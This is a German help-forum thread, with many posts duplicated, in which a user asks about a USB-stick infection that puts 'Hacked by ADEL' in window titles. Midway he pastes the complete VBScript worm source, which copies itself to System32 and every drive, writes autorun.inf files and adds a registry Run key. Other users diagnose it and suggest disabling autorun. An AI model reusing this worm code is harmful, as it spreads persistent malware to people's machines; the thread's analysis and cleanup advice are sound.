20
im Fenstertext des Explorers erscheint die Anzeige HACKED BY ADEL
Habe mit Antivir einen Stick desinfiziert und seitdem im Fenster- und Explorertext (Vorschau) hinter jedem Dateinamen den Zusatz - HACKED BY ADEL. Die Dateien befinden sich eigentlich in Quaratäne. Kann die Infektion schon beim Installieren des Sticks stattgefunden haben?
hallo, Forum,
ich glaube ich habe mir gerade was eingefangen. Ein Freund hat mir auf seinem Stick Dateien mitgebracht. Beim Öffnen mit dem Explorer hat mein Anti-Vir gebimmelt. Zugriff verweigert - Scan gemacht - Signatur angeguckt - Klassifizierung von AVIRA eher harmlos. Trotzdem: Stick formatiert - betreffende Scripte gelöscht.
Nun stelle ich plötzlich fest, dass hinter jedem Datei-Namen, den mir der Explorer anzeigt der Zusatz HACKED BY ADEL steht. Adel ist auch der Name meines Freundes, der aber definitiv nicht der Schöpfer dieses Scripts sein kann. Was ist das?
Erkannt von Antivir(Premium): Dateien: ADEL.vbs und KUNDEN8.vbs - Beschreibung beider Dateien: Contains recognition pattern of the HTML/Silly.Gen HTML script virus
Erstaunlich dabei ist, dass als Quelle zuerst der Stick lokalisiert wurde, beim zweiten Scan die Datei ADEL.vbs aber plötzlich auf meinem lokalen Backaup-Laufwerk war, wohin ich definitiv nichts kopiert habe.
Weiß jemand mehr über dieses ominöse Script?
Please tell me -
Grüße aus Bamberg
Uwe
ich glaube ich habe mir gerade was eingefangen. Ein Freund hat mir auf seinem Stick Dateien mitgebracht. Beim Öffnen mit dem Explorer hat mein Anti-Vir gebimmelt. Zugriff verweigert - Scan gemacht - Signatur angeguckt - Klassifizierung von AVIRA eher harmlos. Trotzdem: Stick formatiert - betreffende Scripte gelöscht.
Nun stelle ich plötzlich fest, dass hinter jedem Datei-Namen, den mir der Explorer anzeigt der Zusatz HACKED BY ADEL steht. Adel ist auch der Name meines Freundes, der aber definitiv nicht der Schöpfer dieses Scripts sein kann. Was ist das?
Erkannt von Antivir(Premium): Dateien: ADEL.vbs und KUNDEN8.vbs - Beschreibung beider Dateien: Contains recognition pattern of the HTML/Silly.Gen HTML script virus
Erstaunlich dabei ist, dass als Quelle zuerst der Stick lokalisiert wurde, beim zweiten Scan die Datei ADEL.vbs aber plötzlich auf meinem lokalen Backaup-Laufwerk war, wohin ich definitiv nichts kopiert habe.
Weiß jemand mehr über dieses ominöse Script?
Please tell me -
Grüße aus Bamberg
Uwe
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 105116
Url: https://administrator.de/contentid/105116
Printed on: April 26, 2024 at 01:04 o'clock
20 Comments
Latest comment
Leider nicht! das .vbs steht für Visual Basic Scribt und die Namen davor sind einfache Dateinamen. Ich habe auch noch keinen Virus mit dem Namen Kunden o. Adel gehört.
Die Daten wurden geadelt - ist doch süß.
Das Skript könntest Du eventuell aus der Quarantäne von Antivir fischen (je nach Einstellung) oder mit viel Glück noch mit einer undelete Software aus dem Stick kratzen.
Aber: Warum soll es nicht Dein Kumpel gewesen sein? Glaubst Du ernsthaft, dass ein Virus so schlau ist, seinen Familiennamen festzustellen und in das Script einzubauen? Denkbar ist alles.
Da auf Sticks auch eine Autorun-Funktion greifen kann, ist das alles möglich. Und da Du natürlich alks Admin arbeitest, kann der auch munter alles in Deinem Namen umbenennen.
Das Skript könntest Du eventuell aus der Quarantäne von Antivir fischen (je nach Einstellung) oder mit viel Glück noch mit einer undelete Software aus dem Stick kratzen.
Aber: Warum soll es nicht Dein Kumpel gewesen sein? Glaubst Du ernsthaft, dass ein Virus so schlau ist, seinen Familiennamen festzustellen und in das Script einzubauen? Denkbar ist alles.
Da auf Sticks auch eine Autorun-Funktion greifen kann, ist das alles möglich. Und da Du natürlich alks Admin arbeitest, kann der auch munter alles in Deinem Namen umbenennen.
besagter ADEL war das nicht, der kanns noch weniger wie ich - ich kann sowas nämlich auch nicht.
Doch das Problem verschärft sich gerade:
Wenn ich über Arbeitsplatz ein Laufwerk zu öffnen versuche, bekomme ich von Windows die Fehlermeldung, die ADEL.vbs könne nicht gefunden werden und nichts geht. Mit dem Explorer gehts. Habe eine Autorun.inf ausfindig gemacht mit Text:
[autorun]
shellexecute=wscript.exe ADEL.vbs
Das löschen dieser Datei bringt aber nichts - Sie ist jetzt aber auf allen Laufwerken zu finden - Langsam werde ich nervös!
Uwe
Doch das Problem verschärft sich gerade:
Wenn ich über Arbeitsplatz ein Laufwerk zu öffnen versuche, bekomme ich von Windows die Fehlermeldung, die ADEL.vbs könne nicht gefunden werden und nichts geht. Mit dem Explorer gehts. Habe eine Autorun.inf ausfindig gemacht mit Text:
[autorun]
shellexecute=wscript.exe ADEL.vbs
Das löschen dieser Datei bringt aber nichts - Sie ist jetzt aber auf allen Laufwerken zu finden - Langsam werde ich nervös!
Uwe
Kein Problem, nimm Dein Image und Deine Datensicherungen und zeig dem Adel den Stinkefinger.
(Ich hab solche Kommentare wie meins hier schon 1000x gelesen - albern, jetzt selbst so zu antworten).
Uwe, wenn Du nichts davon verstehst, was da abläuft, dann schalt den PC ab und frag jemanden, der das kann. Wir können das hier auch nicht so toll, ohne am PC zu sitzen.
Was Du versuchen kannst, ist ein Virenscan offline. Platte an einen anderen Rechner !!!mit abgeschalteter Autostartfunktion!!! anschließen und bereinigen und weitersehen. Daten sichern.
(Ich hab solche Kommentare wie meins hier schon 1000x gelesen - albern, jetzt selbst so zu antworten).
Uwe, wenn Du nichts davon verstehst, was da abläuft, dann schalt den PC ab und frag jemanden, der das kann. Wir können das hier auch nicht so toll, ohne am PC zu sitzen.
Was Du versuchen kannst, ist ein Virenscan offline. Platte an einen anderen Rechner !!!mit abgeschalteter Autostartfunktion!!! anschließen und bereinigen und weitersehen. Daten sichern.
Moin,
hast du besagte ADEL.vbs noch irgendwo in Quarantäne? Wenn ja mache doch bitte mal einen Rechtsklick auf diese ADEL.vbs, klicke auf "Bearbeiten" und kopiere den Text darin in einen Code-Block (siehe Formatierungshilfe) in einem Kommentar hier. Der eine oder andere wird damit sicherlich etwas anfangen können.
Ansonsten sichere mit Knoppix oder einer ähnlichen Live-Linux-CD/DVD alle deine wichtigen Dateien (wichtig: weder vbs, noch sonstige ausführbare Dateien, wie exe, com, bat, cmd usw. sichern) auf USB-Festplatte o.ä.
Danach installiere Windows und die Programme neu, oder überlasse einem Profi das "Schlachtfeld".
MfG,
VW
hast du besagte ADEL.vbs noch irgendwo in Quarantäne? Wenn ja mache doch bitte mal einen Rechtsklick auf diese ADEL.vbs, klicke auf "Bearbeiten" und kopiere den Text darin in einen Code-Block (siehe Formatierungshilfe) in einem Kommentar hier. Der eine oder andere wird damit sicherlich etwas anfangen können.
Ansonsten sichere mit Knoppix oder einer ähnlichen Live-Linux-CD/DVD alle deine wichtigen Dateien (wichtig: weder vbs, noch sonstige ausführbare Dateien, wie exe, com, bat, cmd usw. sichern) auf USB-Festplatte o.ä.
Danach installiere Windows und die Programme neu, oder überlasse einem Profi das "Schlachtfeld".
MfG,
VW
Servus,
schau mal mit regedit in folgenden Baum:
"dort" hat sich dein Freundlicher (nochwenigeralsdukönnender) Kumpel fälschlicherweise als Hacker geoutet und wenn du den Abschnitt "Window Tilte" löschst, dann ist schon mal die Fensteranzeige normal.
Und für den Rest, wäre der Inhalt der Adel.vbs sehr interessant.
Gruß
schau mal mit regedit in folgenden Baum:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
"dort" hat sich dein Freundlicher (nochwenigeralsdukönnender) Kumpel fälschlicherweise als Hacker geoutet und wenn du den Abschnitt "Window Tilte" löschst, dann ist schon mal die Fensteranzeige normal.
Und für den Rest, wäre der Inhalt der Adel.vbs sehr interessant.
Gruß
@"Adel":
Kann es sein, dass der Viren-Lieferant (dein Kumpel) sich an seinem PC mit dem Username "Adel" anmeldet?
Ich habe es schon öfters erlebt, dass Viren bei der Eigen-/ Selbst-Erstellung den Usernamen oder einen ähnlichen Parameter/Variable mit in den Virus einfließen lassen, um die eigentliche Herkunft zu verschleiern usw.
MfG,
VW
Kann es sein, dass der Viren-Lieferant (dein Kumpel) sich an seinem PC mit dem Username "Adel" anmeldet?
Ich habe es schon öfters erlebt, dass Viren bei der Eigen-/ Selbst-Erstellung den Usernamen oder einen ähnlichen Parameter/Variable mit in den Virus einfließen lassen, um die eigentliche Herkunft zu verschleiern usw.
MfG,
VW
Servus Vw,
das müßte dann aber schon ein sehr dämlicher oder alter Virus/Wurm sein - aktuelle Würmer/viren sind doch eher so angelegt, daß Benutzer möglichst nichts vom Vorhandensein seines selbst mitbekommt, um bloss keinen Virenscanner auf den Seuchenträger anzusetzen.
Das Labeln des IE ist daher eher unter der Rubrik "Ich war hier" oder "I was here" anzusiedeln...
Nur weil das .vbs auch so heißt....
Wenn deine Theorie stimmt - müßte der vbs Wurm auf seiner Kiste ja dann auch wie der Threadersteller heißen - und nicht wie dessen Kumpel.
Gruß
das müßte dann aber schon ein sehr dämlicher oder alter Virus/Wurm sein - aktuelle Würmer/viren sind doch eher so angelegt, daß Benutzer möglichst nichts vom Vorhandensein seines selbst mitbekommt, um bloss keinen Virenscanner auf den Seuchenträger anzusetzen.
Das Labeln des IE ist daher eher unter der Rubrik "Ich war hier" oder "I was here" anzusiedeln...
Nur weil das .vbs auch so heißt....
Wenn deine Theorie stimmt - müßte der vbs Wurm auf seiner Kiste ja dann auch wie der Threadersteller heißen - und nicht wie dessen Kumpel.
Gruß
Moin,
Ich gebe zu, die Theorie ist ziemlich gewagt´und unwahrscheinlich, ... aber möglich.
VW
Zitat von @60730:
das müßte dann aber schon ein sehr dämlicher oder
alter Virus/Wurm sein - aktuelle Würmer/viren sind doch eher so angelegt, dass Benutzer möglichst nichts vom Vorhandensein seines selbst mitbekommt, um bloss keinen Virenscanner auf den Seuchenträger anzusetzen.
Das Labeln des IE ist daher eher unter der Rubrik "Ich war
hier" oder "I was here" anzusiedeln...
Naja, es gibt genügend Script-Kiddies, die Spaß daran haben, diese "I was here"-Spielereien zu programmieren, um Leuten zu beweisen, dass sie es geschafft haben, sich in das Betriebssystem zu integrieren.alter Virus/Wurm sein - aktuelle Würmer/viren sind doch eher so angelegt, dass Benutzer möglichst nichts vom Vorhandensein seines selbst mitbekommt, um bloss keinen Virenscanner auf den Seuchenträger anzusetzen.
Das Labeln des IE ist daher eher unter der Rubrik "Ich war
hier" oder "I was here" anzusiedeln...
Nur weil das .vbs auch so heißt....
Wenn deine Theorie stimmt - müßte der vbs Wurm auf seiner Kiste ja dann auch wie der Threadersteller heißen - und nicht wie dessen Kumpel.
Jein, vielleicht hat der Virus ja den Benutzernamen des Wirts (der PC des Kumpels) bereits fest in seine selbst generierte vbs-Datei eingebunden und, wenn der Thread-Ersteller Daten auf einem USB-Stick weitergibt, landet der Username des Threaderstellers in der ADEL.vbs, wobei die Datei dann vermutlich nicht mehr ADEL.vbs, sondern z.B. UWE.vbs heißt, und einen String "Hacked by UWE" in den Explorer einbindet.Wenn deine Theorie stimmt - müßte der vbs Wurm auf seiner Kiste ja dann auch wie der Threadersteller heißen - und nicht wie dessen Kumpel.
Ich gebe zu, die Theorie ist ziemlich gewagt´und unwahrscheinlich, ... aber möglich.
VW
Servus VW,
Ich gebe zu, die Theorie ist ziemlich gewagt´und unwahrscheinlich, ... aber möglich.
yupp - nichts ist unmöglich - wie uns die M4tr1x-Trilogie oder i hacked 127.0.0.1 ja schon bewiesen haben.
So langsam hab ich auch die Tischplatte mit den Fingern durchgetrommelt, vielleicht hat Uwe ja noch das VBS und stellt es uns zur Verfügung.
@uwe
Gruß
Ich gebe zu, die Theorie ist ziemlich gewagt´und unwahrscheinlich, ... aber möglich.
yupp - nichts ist unmöglich - wie uns die M4tr1x-Trilogie oder i hacked 127.0.0.1 ja schon bewiesen haben.
So langsam hab ich auch die Tischplatte mit den Fingern durchgetrommelt, vielleicht hat Uwe ja noch das VBS und stellt es uns zur Verfügung.
@uwe
Gruß
hallo, Timo, hallo VW,
ich bin wieder da. Schön, dass sich jemand meines Problems so sachlich annimmt. Im Moment nur soviel:
Meine Schwierigkeiten scheinen nach ein bisschen Trickserei nun behoben. Es ist außer einer gewissen Verwirrung meinerseits auch weiter kein Schaden entstanden. Trotzdem werde ich das Prozedere, incl. der VBS usw. noch mal zusammenstellen. Denn was da genau abgelaufen ist, habe ich noch immer nicht ganz überrissen.
Bitte habt etwas Geduld - ich mach das heute abend noch.
Multiple thanks to everybody!
ich bin wieder da. Schön, dass sich jemand meines Problems so sachlich annimmt. Im Moment nur soviel:
Meine Schwierigkeiten scheinen nach ein bisschen Trickserei nun behoben. Es ist außer einer gewissen Verwirrung meinerseits auch weiter kein Schaden entstanden. Trotzdem werde ich das Prozedere, incl. der VBS usw. noch mal zusammenstellen. Denn was da genau abgelaufen ist, habe ich noch immer nicht ganz überrissen.
Bitte habt etwas Geduld - ich mach das heute abend noch.
Multiple thanks to everybody!
Zitat von @Auweh:
hallo, Timo, hallo VW,
ich bin wieder da. Schön, dass sich jemand meines Problems so
sachlich annimmt. Im Moment nur soviel:
Meine Schwierigkeiten scheinen nach ein bisschen Trickserei nun
behoben. Es ist außer einer gewissen Verwirrung meinerseits auch
weiter kein Schaden entstanden. Trotzdem werde ich das Prozedere,
incl. der VBS usw. noch mal zusammenstellen. Denn was da genau
abgelaufen ist, habe ich noch immer nicht ganz überrissen.
Bitte habt etwas Geduld - ich mach das heute abend noch.
Multiple thanks to everybody!
hallo, Timo, hallo VW,
ich bin wieder da. Schön, dass sich jemand meines Problems so
sachlich annimmt. Im Moment nur soviel:
Meine Schwierigkeiten scheinen nach ein bisschen Trickserei nun
behoben. Es ist außer einer gewissen Verwirrung meinerseits auch
weiter kein Schaden entstanden. Trotzdem werde ich das Prozedere,
incl. der VBS usw. noch mal zusammenstellen. Denn was da genau
abgelaufen ist, habe ich noch immer nicht ganz überrissen.
Bitte habt etwas Geduld - ich mach das heute abend noch.
Multiple thanks to everybody!
So, also, jetzt gehts weiter:
1. Ja, der ADEL ist auch als Benutzer angemeldet
2. Er scheidet als Bösewicht völlig aus - Erstens, weil mein guter Freund, und Zweitens, weil Bildhauer von Beruf und völlig EDV-Antiseptisch.
3. Hier ist der böse Virus, von dem ich gerne wüsste, ob es wirklich nur ein "Hallo, ich bin drin"- Gag ist.
Übrigens Timo: Thanks für den Tip mit dem Windows Title im IE - Das hat mich vorwärts gebracht!
!Nun, bevor die Tischplatte unter deinen blutigen Fingern birst; hier die ADEL.VBS
'Mutation of Trojan virus.
'My name is KOCH03.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Set fs = createobject("Scripting.FileSystemObject")
Set wn = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = wn.ComputerName & ".vbs"
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe KOCH03.vbs"
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\KOCH03.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\KOCH03.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\KOCH03.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End If
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
if check <> 1 then
Wscript.sleep 120000
End if
loop while check<>1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
PS: Das Ding löst schon Alarm aus, wenn ich es lese!
Chereo
Gut
Dann ist es ja doch kein File-Infector und lediglich der Fenstertitel. Den Namen liest er aus der Registrierung aus und wenn da Koch/Adel drinsteht, dann ist das auch klar.
Sieht also eher aus, als wäre die Absicht des Dings, eine Art Nachbarschaftsstreit anzufachen
Dann ist es ja doch kein File-Infector und lediglich der Fenstertitel. Den Namen liest er aus der Registrierung aus und wenn da Koch/Adel drinsteht, dann ist das auch klar.
Sieht also eher aus, als wäre die Absicht des Dings, eine Art Nachbarschaftsstreit anzufachen
Moin,
demnach hatte ich mit meiner Theorie doch recht .... nur, dass offensichtlich der Hostname und nicht der Benutzername verwendet wird.
Gut zu wissen, dass das Skript nur ein "Ich war hier" ist.
Könntest du das Skript dann vielleicht noch in code-tags packen? (siehe Formatierungshilfe" direkt über dem Kommentar-Feld)
Danke.
VW
demnach hatte ich mit meiner Theorie doch recht .... nur, dass offensichtlich der Hostname und nicht der Benutzername verwendet wird.
Gut zu wissen, dass das Skript nur ein "Ich war hier" ist.
Könntest du das Skript dann vielleicht noch in code-tags packen? (siehe Formatierungshilfe" direkt über dem Kommentar-Feld)
Danke.
VW
high hai, VW,
danke für die Info, im Klartext heißt das wohl, es war ein Gag harmloserer Art. - sorry habe so´n Zeug bisher noch nicht gepostet - Hoffe das war nicht gefährlich!
Trotzdem: Eines musst du mir bitte noch beibiegen:
Wie ist die Autorun.inf auf meine Laufwerke gekommen, und der Eintrag in, wo doch schon beim Anmelden des Sticks der Antivir den Zugriff verweigert hat, bevor irgendwas geöffnet wurde?
Irgendwie muss der dann ja dann doch durchgeschlüpft sein - oder nicht?
Uwe
danke für die Info, im Klartext heißt das wohl, es war ein Gag harmloserer Art. - sorry habe so´n Zeug bisher noch nicht gepostet - Hoffe das war nicht gefährlich!
Trotzdem: Eines musst du mir bitte noch beibiegen:
Wie ist die Autorun.inf auf meine Laufwerke gekommen, und der Eintrag in, wo doch schon beim Anmelden des Sticks der Antivir den Zugriff verweigert hat, bevor irgendwas geöffnet wurde?
Irgendwie muss der dann ja dann doch durchgeschlüpft sein - oder nicht?
Uwe
Moin Auweh,
Steht ebenfalls in diesem zusammengeschroteten Kiddieschnipsel.
Konstrukte, die funktionieren ohne dass nachvollziehbar ist warum sind in der politischen Welt hinzunehmen (siehe F.D.P.), aber nicht im Bereich der IT.
Grüße
Biber
Trotzdem: Eines musst du mir bitte noch beibiegen:
Wie ist die Autorun.inf auf meine Laufwerke gekommen, ....
Wie ist die Autorun.inf auf meine Laufwerke gekommen, ....
Steht ebenfalls in diesem zusammengeschroteten Kiddieschnipsel.
...
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
...
sorry habe so´n Zeug bisher noch nicht gepostet - Hoffe das war nicht gefährlich!
Codefetzen ohne jegliche Kommentierung sind immer unwartbar und dementsprechend nur zum einmaligen Gebrauch geeignet. Wenn also jemand für die Erstellung dieses Skriptchens bezahlt hätte, dann wäre es rausgeworfenes Geld. Und insofern unter Investitionsgesichtspunkten gefährlich.Konstrukte, die funktionieren ohne dass nachvollziehbar ist warum sind in der politischen Welt hinzunehmen (siehe F.D.P.), aber nicht im Bereich der IT.
Grüße
Biber
Tach auch, Biber,
tschludige, dass ich so begriffsstuzig bin, aber dieser Befehl ist doch Bestandteil eines Scripts, das laut Antivir nicht ausgeführt wurde!
Wenn das so einfach geht, brauche ich doch keinen Guard mehr.
Une wenns och so einfach ist:
Kann ich verhindern, dass unauthorisiert Dateien (von extern) auf meine lokalen Laufwerke kopiert werden, (denn das ist hier ja scheinbar passiert)ohne mich bei meiner eigenen Arbeit bei jedem Kopier- oder Speichervorgang jedesmal identifizieren zu müssn?
Uwe
tschludige, dass ich so begriffsstuzig bin, aber dieser Befehl ist doch Bestandteil eines Scripts, das laut Antivir nicht ausgeführt wurde!
Wenn das so einfach geht, brauche ich doch keinen Guard mehr.
Une wenns och so einfach ist:
Kann ich verhindern, dass unauthorisiert Dateien (von extern) auf meine lokalen Laufwerke kopiert werden, (denn das ist hier ja scheinbar passiert)ohne mich bei meiner eigenen Arbeit bei jedem Kopier- oder Speichervorgang jedesmal identifizieren zu müssn?
Uwe
Moin Auweh,
AntiVir hat das *.vbs geblockt, als Du es per Doppelklick im Explorer ausführen lassen wolltest.
Möglicherweise hat Antivir aber NICHTS geblockt, als Dein Kumpel den USB-Stick mit dem Autorun.inf-File eingesteckt hat.
Evtl. wurde das ausgeführt.
Ich gebe Dir Recht, dass der Stressmacher eigentlich nicht die doppelgeklickte Datei sein sollte.
Und die kannte sich damals noch nicht mal mit USB-Sticks so gut aus.
Grüsse
Biber
aber dieser Befehl ist doch Bestandteil eines Scripts, das laut Antivir nicht ausgeführt wurde!
Das kannst Du so nicht sagen...AntiVir hat das *.vbs geblockt, als Du es per Doppelklick im Explorer ausführen lassen wolltest.
Möglicherweise hat Antivir aber NICHTS geblockt, als Dein Kumpel den USB-Stick mit dem Autorun.inf-File eingesteckt hat.
Evtl. wurde das ausgeführt.
Ich gebe Dir Recht, dass der Stressmacher eigentlich nicht die doppelgeklickte Datei sein sollte.
Kann ich verhindern, dass unauthorisiert Dateien (von extern) auf meine lokalen Laufwerke kopiert werden,
Wie meine Lieblingspraktikantin immer zu sagen pflegte: "Ich lass mir nicht vom jedem irgendwas irgendwo reinstecken."Und die kannte sich damals noch nicht mal mit USB-Sticks so gut aus.
Grüsse
Biber
Moin,
das Problem bei solchen "niedlichen" Skript-Viren ist, dass diese auf einfachen Windows-Funktionen basieren, die an sich nichts böses wollen. Daher wäre es sicherlich fatal, wenn AntiVir jedes Auftreten dieser Befehle blockieren würde.
Jeder, auch nur leicht Batch-erfahrene, Admin wird ohne weiteres eine Batch-Datei schreiben können, die deinem Windows-Betriebssystem mit einfachsten Batch-Befehlen ohne weitere Programme schaden kann. Ein gutes Beispiel für vbs-Viren hast du ja quasi "live" erlebt.
Meine Versuchs-Batch (irritiert eigentlich nur den User) wurde jedenfalls bisher noch von keinem AntiVirus-Programm erkannt, obwohl ein User diese "nervige" Datei sicherlich als Virus einstufen würde.
MfG,
VW
das Problem bei solchen "niedlichen" Skript-Viren ist, dass diese auf einfachen Windows-Funktionen basieren, die an sich nichts böses wollen. Daher wäre es sicherlich fatal, wenn AntiVir jedes Auftreten dieser Befehle blockieren würde.
Jeder, auch nur leicht Batch-erfahrene, Admin wird ohne weiteres eine Batch-Datei schreiben können, die deinem Windows-Betriebssystem mit einfachsten Batch-Befehlen ohne weitere Programme schaden kann. Ein gutes Beispiel für vbs-Viren hast du ja quasi "live" erlebt.
Meine Versuchs-Batch (irritiert eigentlich nur den User) wurde jedenfalls bisher noch von keinem AntiVirus-Programm erkannt, obwohl ein User diese "nervige" Datei sicherlich als Virus einstufen würde.
Kann ich verhindern, dass unautorisiert Dateien (von extern) auf meine lokalen Laufwerke kopiert werden,
Deaktiviere den Autostart. Wie das generell geht, weiß ich zwar so nicht auswendig, aber ich bin mir sicher, dass du dazu genügend Treffer in der internen Forum-Suche oder bei Google findest. Dann werden keine Autorun.inf-Dateien mehr ausgeführt, wodurch allerdings auch beim einlegen einer CD die Installation nicht mehr automatisch startet.MfG,
VW
Danke Jungs,
jetzt bin ich glücklich.
Den Rest krieg ich hin. (Und mit der Scripterei werd ich mich auch mal näher befassen)
Werd euch weiterempehlen!
Gruß und Thanks a lot!
Uwe
jetzt bin ich glücklich.
Den Rest krieg ich hin. (Und mit der Scripterei werd ich mich auch mal näher befassen)
Werd euch weiterempehlen!
Gruß und Thanks a lot!
Uwe
